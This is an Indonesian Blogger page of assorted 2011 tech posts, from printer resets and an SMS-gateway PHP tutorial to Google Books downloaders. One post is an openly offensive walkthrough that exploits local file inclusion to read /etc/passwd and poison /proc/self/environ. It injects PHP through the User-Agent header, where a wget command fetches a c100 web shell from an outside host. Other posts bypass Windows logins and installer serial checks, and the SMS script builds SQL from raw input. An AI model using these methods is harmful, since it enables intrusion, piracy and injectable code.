This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Senin, 27 Juni 2011

Reset Manual Printer IP1880

Setelah tinta habis dan diisi ulang tidak akan lagi bisa mengenali cartridge Anda alias cuma “kedip-kedip” aja indikator led-nya. Berikut cepat mengatasi permasalahan ini.
1. Cabut kabel power dari printer.
2. Tekan tombol power printer, sambil tancap lagi kabel power ke printer (Jangan dilepas tekan tombol powernya)
3. Tekan tombol resume 2x
4. Lepaskan tangan dari semua tombol.
4. Pada saat mau print, akan ada jendela peringatan. Intinya tekan saja tombol resume selama 4 detik.

Reset Password Windows 7, Windows XP, Vista

Apakah anda pernah lupa passsword windows anda? Atau anda sedang menghadapi masalah dengan komputer user yang dikasih password? Berikut sedikit tutorial untuk mereset password windows 7, reset password Windows Vista dan Mereset password windows XP!
Terdapat beberapa utility yang berbasis linux, waktu untuk proses booting yang agak lama dan proses untuk menghapus password windows yang agak sedikit rumit, apalagi yang tidak terlalu paham tentang linux. dalam posting kali ini, saya akan menunjukkan cara yang mudah untuk menghapus password logon di windows 7, tips berikut berlaku juga untuk windows:
  • Windows Server 2008 Standard SP2 (v.275)
  • Windows Vista Business SP0
  • Windows Vista Ultimate SP1
  • Windows Vista Ultimate SP0
  • Windows Server 2003 Enterprise
  • Windows XP
  • Windows XP SP1
  • Windows XP SP2
  • Windows XP SP3
  • Windows 7
Langkah Langkahnya:
1. Download program untuk reset password windows 7 Kemudian Ekstrak dan burn / bakar ke CD.

2. Settinglah BIOS dikomputer anda agar bisa booting melalui CD/DVD yang telah kita isi dengan program CD-koonboot tadi, masukin CD/DVD tadi ke komputer anda dan restart mesin anda, dan dalam beberapa detik anda dapat melihat logo Cd-koonbot. Tekan Enter lalu tunggu beberapa detik lagi.

3. Anda akan mendapatkan logon screen seperti gambar dibawah ini, hanya dengan menekan tombol “ENTER” dan kita dapat masuk ke windows tanpa password!!.

Nah Tool yang kecil ukurannya ini dapat mereset password windows 7 ultimate x86, dan sudah pasti dapat pula mereset versi windows yang lain, perlu diperhatikan, antivirus menggangap program ini adalah virus,  jadi non aktifkan dahulu antivirus anda sebelum membakar atau burn ke cd. Selamat mereset password. Awas!! jangan disalah gunakan yah!


 Softwarenya silahkan 

Membuat Flashdisk backup password windows 7

Pernahkah anda lupa sendiri akan kata password windows 7 laptop anda?, mungkin karena ditinggal terlalu lama, pergi liburan atau karena bertugas di luarkota, kita sekarang dikedepankan dengan situasi dimana password atau katakunci dibeberapa komputer dan aplikasi online seperti facebook atau email, membutuhkan password sendiri, saking banyaknya kadang kita lupa sendiri. ada baiknya kita mem-backup password windows 7 di pc kita ke flashdisk, berikut ini adalah menu untuk membuat flash disk yang bisa mereset password anda..
Buat flashdisk untuk reset password windows 7 
selanjutnya.....
simpan flashdisk tersebut ditempat yg aman, tapi jangan lupa untuk mengingat tempat dimana kita menyimpan flashdisk yah.:)

Sabtu, 25 Juni 2011

aplikasi web server portable buat Flashdisk & ext Hardisk

Berikut beberapa pilihan aplikasi webserver portabel yang bisa digunakan untuk usb flash disk, cd atau external hard disk .

Tonido – Personal Web Application Server
tonido web server
Tonido adalah aplikasi Web Server Gratis Pribadi. Alat ini intuitif memungkinkan Anda untuk mengakses dan berbagi konten yang disimpan secara lokal langsung melalui browser web. Server portabel Anda sendiri untuk berbagi file dan foto dan banyak lagi. Sebagai contoh, Tonido dapat digunakan untuk host blog Anda sendiri, torrents saham, host album foto, mendengarkan musik atau Mp3 dari mana saja, file backup dari satu PC ke lainnya, dll
URL: http://tonido.com/


Server2Go – Portable Web Server
server 2 go
Server2Go Portable Webserver meliputi Apache, MySQL, SQLite, Perl dan PHP. aplikasi Web dengan Server2Go dapat diakses langsung dari stick usb, CD rom atau dari folder di harddisk lokal. Sangat mudah untuk menunjukkan aplikasi ke klien, dosen atau teman sekelas Anda. Portable Webserver ini tersedia dalam berbagai paketmulai dari paket mikro ke Server. JUga bisa untuk PERL.
URL: http://server2go-web.de/


USB Webserver – Portable Web Server
usb web server
USB Webserver adalah paket kecil yang bagus untuk Server Web yang meliputi Apache, MySQL, PHP, dan PHPMyAdmin. Aplikasi ini dapat diminimise ke tray. Dapat dijalankan baik portable atau diinstal sebagai sebuah layanan sistem. Item menu tersedia dalam bahasa Inggris melalui tab Pengaturan. Aplikasi ini memerlukan sekitar 22.3MB untuk instalasi portabel lengkap.
URL: http://www.usbwebserver.net/en/


XAMPP – Portable Web Server
xampp web server
XAMPP adalah paket Web Server yang berisi Apache, MySQL, PHP dan Perl. XAMPP memungkinkan itu pengguna untuk host Website, Blog, CMS atau mencoba kode PHP dan MySQL uji struktur database untuk testing atau production. Terbaik dari semua, server XAMPP dapat dengan mudah dijalankan dari perangkat USB portabel.
URL: www.apachefriends.org/en/xampp.html


Uniform Server – WAMP Portable Website Server
uniform portable webserver
Uniform Server adalah Windows Apache MySQL PHP lengkap (WAMP) server paket portabel yang memungkinkan pengguna untuk melakukan pengetesan maupun live site langsung dari rumah di perangkat portabel. Uniform Server juga memungkinkan para pengembang aplikasi Web untuk menguji aplikasi yang dibuat dengan Apache, PHP, MySQL dan Perl tanpa menempatkan pekerjaan pada dedicated server atau shared hosting.
URL: http://www.uniformserver.com/

Kalau saya terlanjur pakai usb webserver. Bukan karena terbaik tapi karena terlanjur pakai ini dan tidak ada masalah.
Semoga bermanfaat.

Menggabungkan SMS Gateway dan PHP

Setelah bosen bermain-main dengan RF Online (www.RF-Online.web.id) dan juga bosen pindah-pindah di RFO private server... akhirnya gw nemuin mainan baru. Istilahnya sms gateway. Ga tahu artinya, yang pasti di sini kita memfungsikan komputer sebagai lalu-lintas data SMS.
SMS yang masuk bisa diolah dengan komputer trus kemudian komputer menentukan sms balasannya. SMS responder mungkin itu istilah yang tepat. Pernah tahu khan kaya' iklan-iklan di TV misalnya ketik AFI <spasi> gecko kirim ke 8484 ada lagi yang kuis-kuis, trus lagi pengisian pulsa misalnya: epulsa vxl25 08121727266 dudulz
Pada artikel ini kita akan belajar bersama yang melalui wireless connection, berarti sms akan dikirim dari kartu gsm yang kita posisikan sebagai modem gsm. Dan maaf yang ip sms connection penulis belon nyoba..... :D
Berikut skema sistem yang akan penulis bahas:
skema sms gateway melalui wireless connection
Berikut alat dan bahan yang harus kita sediakan (lihat skema di bagian your sistem):
  1. 1 buah komputer; kita pakai OS Windows XP
    penulis menggunakan Win XP di laptop Byon Centrino Duo, RAM 2G.
  2. 1 buah gsm modem atau handphone yang bisa difungsikan sebagai gsm modem
    penulis menggunakan Sony Ericsson K750i dengan nomor IM3
  3. Kabel atau bluetooth untuk koneksi HP dengan komputer; penulis menggunakan kabel bawaan dari SE K750i
  4. Driver atau PC suite handphone; penulis menggunakan PC suite yang sudah tersedia di paket penjualan SE K750i
  5. 1 buah handphone untuk mengirim sms; penulis memakai Motorolla W150i dengan nomor Fren
  6. 1 buah software sebagai gateway; kita pakai nowsms
  7. apache, MySQL dan PHP; penulis memakai appserv 2.5.7
Langkah pertama yaitu menginstall appserv di komputer kita.
  1. test di browser dengan mengetik http://localhost apakah sudah tampil?? Kalau sudah tampil berarti Webserver sudah bisa.
  2. selanjutnya tes lagi ketik http://localhost/phpmyadmin. Kalau sudah jalan berarti PHP dan MySQLnya sudah berfungsi dengan baik
Langkah ke dua adalah menghubungkan HP dengan komputer. Jangan lupa menginstall juga driver atau PC Suite HP tersebut. Pastikan HP dan komputer sudah terhubung dengan baik.
connect ok
Langkah ke tiga yaitu menginstall NowSMS. File installer Now SMS/MMS gateway ini cuman 7,42MB dan bisa diunduh dengan mudah di http://www.nowsms.com. Software ini berbayar tetapi kita bisa mencoba gratis dan full fungsional selama 60 hari. (Mmmm jamunya banyak tuh di internet... kalo pengen make terus xixixixi......)
Setelah kita install kita akan disuguhi interface seperti ini:
now sms mms gateway
Langkah ke empat tambahkan modem gsm / HP kita ke situ.
  1. klik Add
  2. Pilih GSM Phone or Modem kemudian klik OK
    now sms 2
  3. Pilih modem kita dan isikan pin, di sini pin default SE adalah 1234. Dikosongi juga bisa. Klik Test and add modem. Kalau berhasil muncul tulisan modem successfully tested!!
    now sms mms gateway
Langkah ke lima adalah menyeting SMSC connection:
  1. Klik SMSC di menu atas
  2. Pilih SMSC connection kamu, dalah kasus ini yang baru ditambahkan adalah Sony Ericsson 750 USB WMC Modem.
    Kalo ingin menambahkan devices lain ya tinggal ikuti langkah ke empat
  3. Klik properties dan isikan nomer telepon di modem / HP SE K750i (dalam kasus ini yang nomer IM3)
  4. check receive SMS Messages
    setting SMSC di nowsms
  5. Klik OK

Langkah ke enam adalah menjalankan SMS gateway service:
  1. Klik Service di menu atas program now sms.
  2. Kemudian check sms gateway run as a service.
  3. Anda akan dimintai persetujuan dan nowsms akan restart dirinya secara otomatis untuk berjalan sebagai service.
    berikut gambar now sms yang sudah berfungsi sebagi service:
    now sms mms as a service
Langkah ke tujuh adalah mencoba mengirim sms melalu web interface now sms:
  1. Secara default now sms berjalan di localhost atau dengan ip address 127.0.0.1 dengan port 8800
  2. Kita buka browser dan ketikkan alamat berikut: http://localhost:8800
  3. akan muncul interface seperti ini:
    now sms web interface
  4. Isikan phone number dan Text kemudian klik submit
  5. Maka sms Anda akan terkirim ke nomer penerima
 
Apakah sudah puas dengan ini aja??? kalo belum mari kita hubungkan now sms dengan PHP dan MySQL. (Tapi maaf penulis mo bikin teh rosella dulu. haus...)
Menghubungkan now sms/ mms gateway dengan PHP dan MySQL
Skenarionya nanti sms akan dikirim dengan HP W150i yang berfungsi sebagi pengirim sms. Kemudian diterima HP K750i (gsm modem) yang diteruskan ke kompie diterima sms gateway yakni now sms kemudian diteruskan ke script php. Script PHP kemudian meneruskan menyimpan ke database MySQL.
langkah pertama yaitu membuat database mysql dengan nama nowsms
  1. ketik http://localhost/phpmyadmin di browser untuk membuka phpmyadmin
  2. ketik nama database, di sini kita paka nama nowsms
    membuat database di phpmyadmin

  3. kemudian masukkan kode sql ini untuk membuat tabel dengan nama inbox yang terdiri dari 2 column yaitu id dan isi

CREATE TABLE `inbox` (
`id` int(5) NOT NULL auto_increment,
`isi` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=4 ;

  1. berikut struktur datanya.... (maaf sederhana bgt untuk mempermudah pemahaman... )
    struktur data untuk dihubungkan dengan now sms
Langkah ke dua adalah membuat script PHP yang bertugas memasukkan sms ke database MySQL
  1. buka windows explorer untuk membuat direktori baru dengan nama nowsms
  2. kalo di komputer penulis urlnya adalah C:AppServwwwnowsms
    url script php now sms
  3. kemudian buat file dengan nama index.php yang isinya sebagai berikut:
<?php
// setting databasenya
$db_host = "localhost";
$db_user = "root";
$db_pass = "sipit";
$db_name = "nowsms";

// menghubungkan dengan database
$link = mysql_pconnect ($db_host, $db_user, $db_pass) or die ("Ga bisa connect");
mysql_select_db ($db_name) or die ("Ga bisa select database");

// trim inputan. ini dihilangkan juga tidak masalah
$isi = trim($isi);

//memasukkan ke table inbox
$sql = "INSERT INTO inbox
SET id='',
isi='$isi'";
$query = mysql_query($sql) ;
?>

  1. Selesai (jangan lupa extensinya adalah *.php jadi kalau lewat notepad pilih save as typenya sebagai all file, kemudian beri nama index.php)
langkah ke tiga adalah mengatur setting di now sms
  1. Pilih 2-Way di menu atasnya
  2. Check process received sms message
  3. Isi SMS command prefix dengan tanda bintang atau * atau asterix (*_*;)
    maksudnya semua sms akan diproses. apabila ingin command prefix tertentu silahkan diisi misalnya AFI (sehingga nantinya akan memproses SMS yang berawalan dengan AFI saja)
  4. isi Receive Phone Number(s) sesuai yang Anda isikan di SMSC connection tadi. (nomer IM3 yang di GSM Modem/ K750i)
  5. Command execute isi dengan: http://localhost/nowsms/index.php?isi=@@FULLSMS@@
  6. klik ADD
  7. Klik APPLY
  8. Jadi deh
Nanti apabila ada sms masuk ke HP / modem gprs kita maka otomatis akan terekam di database kita.
Masih belum puas dengan hasil yang ini??? Iya, emang masih segini doang. Nantinya ini bisa dibikin auto respond sms. Bisa dihubungkan dengan YM ataupun iRC. Tergantung kreativitas kita..
Segini dulu.. kalo ada saran, masukan, sumbangan atau apa ja silahkan dikomentari .. Ntar artikelnya dilanjut lagi.
-geckowebid

Menyembunyikan CSS styles biar tidak diintip

Karena suatu alasan beberapa webmaster tidak ingin kode CSSnya diintip oleh orang lain. Salah satu alternatifnya adalah disable klik kanan dengan javascript. tapi kalau javaScript dimatikan ya masih bisa dilihat.... tanpa javascript ya bisa diintip dengan leluasa.
Cara lain adalah menggunakan PHP session. Silahkan lihat sourcenya ini:

Kode HTML menyembunyikan CSS

<?php
session_start();
header("Cache-Control: no-cache, must-revalidate");
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");
$_SESSION['kunci']="gecko.web.id";
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Menyembunyikan CSS</title>
<link rel="stylesheet" type="text/css" href="styles.php" media="all" />

</head>

<body>
<h1>Hello!!!!!!</h1>
<br />
<h2>iklan nih.......</h2>
<p><a  class="funny blue" href="http://gecko.web.id"><b>http://gecko.web.id </b></a></p>
</body>
</html>

 

Kode CSS yang disembunyikan

kemudian kode CSSnya dijadiin PHP cuman dikasih header CSS seperti ini:

<?php
session_start();
header("Content-type: text/css");
header("Cache-Control: no-cache, must-revalidate");
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");
$key=$_SESSION['kunci'];
if($key!='gecko.web.id')
{
die('<h1>Dilarang ngintip!!!</h1>cari tahu caranya di www.gecko.web.id ');
}
session_destroy();

?>
.funny {
    display: inline-block;
    outline: none;
    text-align: center;
    text-decoration: none;
    font: 14px/100% Arial, Helvetica, sans-serif;
    padding: .5em 2em .55em;
    text-shadow: 0 1px 1px rgba(0,0,0,.3);
    -webkit-border-radius: .5em;
    -moz-border-radius: .5em;
    border-radius: .5em;
    -webkit-box-shadow: 0 1px 2px rgba(0,0,0,.2);
    -moz-box-shadow: 0 1px 2px rgba(0,0,0,.2);
    box-shadow: 0 1px 2px rgba(0,0,0,.2);
}



/* blue */

.blue {
    color: #ffffff;
    border: solid 1px #0076a3;
    background: #0095cd;
    background: -webkit-gradient(linear, left top, left bottom, from(#00adee), to(#0078a5));
    background: -moz-linear-gradient(top,  #00adee,  #0078a5);
    filter:  progid:DXImageTransform.Microsoft.gradient(startColorstr='#00adee', endColorstr='#0078a5');
}
.blue:hover {
color: #fcd3a5;
    background: #007ead;
    background: -webkit-gradient(linear, left top, left bottom, from(#0095cc), to(#00678e));
    background: -moz-linear-gradient(top,  #0095cc,  #00678e);
    filter:  progid:DXImageTransform.Microsoft.gradient(startColorstr='#0095cc', endColorstr='#00678e');
}
.blue:active {
color: #fcd3a5;    background: -webkit-gradient(linear, left top, left bottom, from(#0078a5), to(#00adee));
    background: -moz-linear-gradient(top,  #0078a5,  #00adee);
    filter:  progid:DXImageTransform.Microsoft.gradient(startColorstr='#0078a5', endColorstr='#00adee');
}



/* post title */
h1 {
    color: #8f0206;
    font: normal 32px/125% 'Copse', Georgia, serif;
    letter-spacing: -.03em;
    margin: 30px 0 10px 0;
    text-decoration: none;
    display: inline;
    vertical-align: top;
    text-shadow: 2px 2px 2px #ccc;
}

h2 {
    color: #8f0206;
    font: normal 25px/125% 'Copse', Georgia, serif;
    letter-spacing: -.03em;
    margin: 30px 0 10px 0;
    text-decoration: none;
    display: inline;
    vertical-align: top;
    text-shadow: 2px 2px 2px #ccc;
}


sekian aja gan, semoga puas.. hehe
Jangan lupa komentar buat improvement atau ada trik lain yg lebih sederhana

Jumat, 24 Juni 2011

Tanam Shell via LFI dengan Metode Proc/Self/Environ

Dalam tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas  sebelumnya di website milw0rm pada paper ke 361.
Ok kita langsung saja…
1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.
contoh : http://site.com/info.php?file=news.php
2. coba kita ganti “news.php” dengan “../../../”.
contoh : http://site.com/info.php?file=../../../
lalu kita mendapat error, seperti berikut…
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.
contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
bagaimana jika kita naikan directorynya ?
mari kita coba…
contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd
Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”
contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ
Jika anda mendapatkan yang seperti ini :
DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80
Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD
4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ”
lalu pada user-agent isikan dengan kode berikut :
<?system(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>
atau
<?exec(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>
lalu submit.
5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.
http://www.site.com/shell.php
happy hacking !

Kamis, 23 Juni 2011

Menembus Proteksi Serial Number atau Password

Latar belakang
Mungkin dalam keseharian ada di antara kita yang tidak sengaja menghilangkan Password
atau Serial Number dari program yang sudah kita beli. Kalau sudah begitu tentunya repot. Untuk
mendapatkannya kembali bisa saja dengan menghubungi toko retail maupun vendor program
tempat program tersebut dibeli. Namun, jika ada peraturan dari vendor yang mengharuskan
membeli ulang password maupun serial number yang hilang, bagaimana? Bagi Anda mungkin itu
bukan masalah . Tapi bagi Saya itu mungkin salah satu masalah besar.
Dari kasus inilah Saya mencoba menerapkan kegunaan Win32 Hook. Sekedar informasi,
teknik seperti ini sering digunakan oleh para Reverser di dunia Reverse Engineering. Untuk
melakukan debugging file berukuran besar bukan hal yang mudah, memerlukan waktu lama dan
harus didukung dengan hardware yang cukup mewah. Bayangkan saja debugging file berukuran
diatas 100 MB dan didalamnya mengandung Crypto RSA?!?! Kalau Saya sih membayangkan saja
sudah tidak mau, apalagi benar-benar mempraktekkannya.. MALAS!
Paper ini bukanlah sebuah tutorial, tetapi hanyalah sebuah informasi. Implementasi dari
pemikiran Saya dengan menerapkan Win32 Hook. Jadi jangan berharap lebih ya? . Karena disini
Saya tidak mengajak Anda melakukan proses Reverse Engineering ataupun Coding secara
mendalam.. MALAS! . Mungkin lain kali.. tapi gak janji loh..


Teori

Sekedar pengetahuan bagi Anda yang mungkin masih awam dengan istilah pemrograman
dan dunia komputer, serta bagi Anda yang bukan Programmer (karena Anda berarti sama seperti
Saya.. ) Hook atau Win32 Hook merupakan salah satu point mekanisme penanganan pesan
(Message-Handling) di dalam Microsoft Windows. Dimana sebuah aplikasi dapat menginstal suatu
sub-rutin untuk memonitor lalu lintas pesan didalam sistem dan beberapa proses tertentu dari
pesan tersebut sebelum mencapai prosedur jendela target.
Hook itu sendiri termasuk dalam kategori Handles and Object. Dan masuk dalam spesifikasi
User object. Lantas mengapa hal “ANEH” ini diperlukan dalam teknik pemrograman?? Ada 2 alasan..
Pertama, penggunaan obyek dapat memastikan bahwa pengembang
(Developer/Programmer) tidak menulis kode secara spesifik untuk low-level, struktur internal. Hal ini
memungkinkan Microsoft untuk menambahkan atau mengubah kemampuan sistem operasi,
sepanjang pemanggilan konvensi yang asli terjaga. Jadi jika suatu saat Microsoft meluncurkan
Operating System, aplikasi yang dibuat oleh para developer ini akan mendapatkan kemampuan baru
dengan sedikit penambahan atau tidak sama sekali.
Kedua, pemakaian obyek memungkinkan pengembang (Developer/Programmer)
mendapatkan keuntungan dari keamanan Win32. Masing-masing obyek mempunyai daftar kendali
akses sendiri (access-control list /ACL) yang menetapkan jenis-jenis tindakan proses dapat berjalan pada obyek.
Operating System menguji suatu obyek ACL setiap kali sebuah aplikasi mencoba untuk
menciptakan handle pada obyek.


Windows APIs



SetWindowsHookEx (Referensi USER32.DLL)

HHOOK SetWindowsHookEx(
int idHook, // type of hook to install
HOOKPROC lpfn, // address of hook procedure
HINSTANCE hMod, // handle of application instance
DWORD dwThreadId // identity of thread to install hook for
);


CallNextHookEx (Referensi USER32.DLL)

LRESULT CallNextHookEx(
HHOOK hhk, // handle to current hook
int nCode, // hook code passed to hook procedure
WPARAM wParam, // value passed to hook procedure
LPARAM lParam // value passed to hook procedure
);


UnhookWindowsHookEx (Referensi USER32.DLL)

BOOL UnhookWindowsHookEx(
HHOOK hhk // handle of hook procedure to remove
);


Proof of Concept

Jalankan program Enable Hook, Anda akan melihat icon kecil di tray icon dengan caption
“MRHPx Enable Hook OFF”. Program Enable Hook ini telah diuji pada beberapa aplikasi yang
menggunakan proteksi Password maupun Serial Number pada saat installasi, salah satunya adalah
DigiFish AncientOcean v1.01. Tanpa Serial Number yang benar Anda tidak akan dapat melakukan
installasi program karena tombol “Next” dalam status disable (Screen. 1)

Screen 1
Setelah itu coba Anda klik kiri dengan mouse, program Enable Hook yang berada di tray icon sampai
icon dan statusnya berubah menjadi ON (Screen. 2). Tanda berarti OFF, dan tanda berarti ON. Lalu coba klik tombol “Next” disable yang berada di jendela installasi program tadi.
Bagaimana? Statusnya berubah menjadi Enable dan bisa di klik dengan mouse bukan?


Screen 2



Kesimpulan

Mengapa tombol “Next” yang semula disable berubah menjadi enable? Padahal Serial
Number masih kosong, tidak diisi sama sekali? Jawabannya adalah karena di dalam “Handles and
Objects” sebuah aplikasi bisa meraih Obyek-Jendela handle yang ada. Sama halnya dengan Anda
tidak perlu mengganti channel TV manual, sampai harus jalan bolak-balik dari tempat duduk Anda ke
meja TV jika sudah ada remote control di tangan Anda. Jadi meskipun diisi Password dan Serial
Number yang benar ataupun tidak benar sekalipun, installasi akan tetap berjalan lancar. Sampai
disini, Anda sudah melihat kehebatan Win32 Hook bukan. Jadi jangan pernah menganggap remeh
Win32 APIs Hook sebelum mempelajarinya. Bahkan proteksi FLEXlm yang terkenal itupun takluk
karena hal ini. Untuk para developer, apakah masih yakin proteksi program installer Anda ini benar-
benar aman?? Silahkan berkreasi dan berekspresi dengan Win32 APIs. Terima kasih semoga
bermanfaat.


Rabu, 22 Juni 2011

Animasi Seram 1

PERHATIKAN DENGAN SEKSAMA SELAMA 1 MENIT LUKISAN KUDA DI DINDING


50 Website Paling Seram

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Minggu, 19 Juni 2011

5 Tools untuk Download Buku dari Google book

Google Book Search is a tool from Google that searches the full text of books that Google scans, converts to text using optical character recognition, and stores in its digital database. Many popular books are available with Google Book. The books available can be read online only and cannot be downloaded for later use. You can download certain books as pdf that allows public-domain works and are free from copyright protection. Only few books are available with full preview based on agreements with publishers.
 
Following are different tools using which you can download any Google book and save it as PDF file or print it.

1) Google Books Downloader
Google Book Downloader is a tool that allows you to save book as PDF from google to your computer. Before using this tool make sure you have properly installed Microsoft .net Framework 3.5 SP1(Install)

How to use Google Books Downloader?
  1. Download Google Books Downloader. Extract or unzip the file. Double click mdgb.exe to run the application.
  2. Paste the URL of the book you want to download.
  3. Press “Check” button. Book will be checked and all available pages will be retrieved.
  4. Press “Download entire book” button to download all the pages in one go.
  5. Press “Save entire book as…” button. All downloaded pages will be saved in PDF format.
2) Leechvideo
Visit leechvideo and input URL of the book you searched from Google. Input the URL for the book you want to download and press the ‘Grab’ button. The page retrieval process in the form of image files will start as soon as you press the ‘Grab’ button. Click right mouse button on the links and save it manually one by one. You can use Orbit for batch downloading

3) Greasemonkey script
This is the most powerful and stable way to download Google Book. You can easily download any book from books.google.com using Greasemonkey script. Just follow the simple steps below.
  1. This hack only works with firefox browser. Make sure you install firefox browser. 
  2. Install Flashgot to firefox browser and restart your firefox browser.
  3. Search any book on books.google.com and you’ll notice a download button at the sidebar as shown in screenshot.
  4. Click the download button to download the images of each. Select the pages you wish to download and then right click and select FlashGot Selection to download the selected pages.
4) Laneware.net
Visit laneware. The tool works only on IE browser. Input the URL of the book you wish to download and you will get the links of the pages retrieved. I tried the tool but did not found much success. You can use its ‘FAQ and Help’ section for troubleshooting tips.

5) ClickBook
If you are looking for advance tool that can download google book and can print them for you as well then ClickBook is the best solution for you. The tool does not come free and is available for $49.95. Works only with Windows 95/98/ME/NT/2000/2003/XP/Vista. Visit ClickBook for more details.
6) Download book without using any Tool
  1. Open computer with admin privileges and launch your Internet Explorer (Not Firefox). Now visit to the page in books.google.com that you want to download.
  2.  Navigate to “C:\Documents and Settings\%admin_name%\Local Settings\Temporary Internet Files\” of your computer machine and delete all of the content of the folder.
  3. Browse the pages of the books that you want to download.
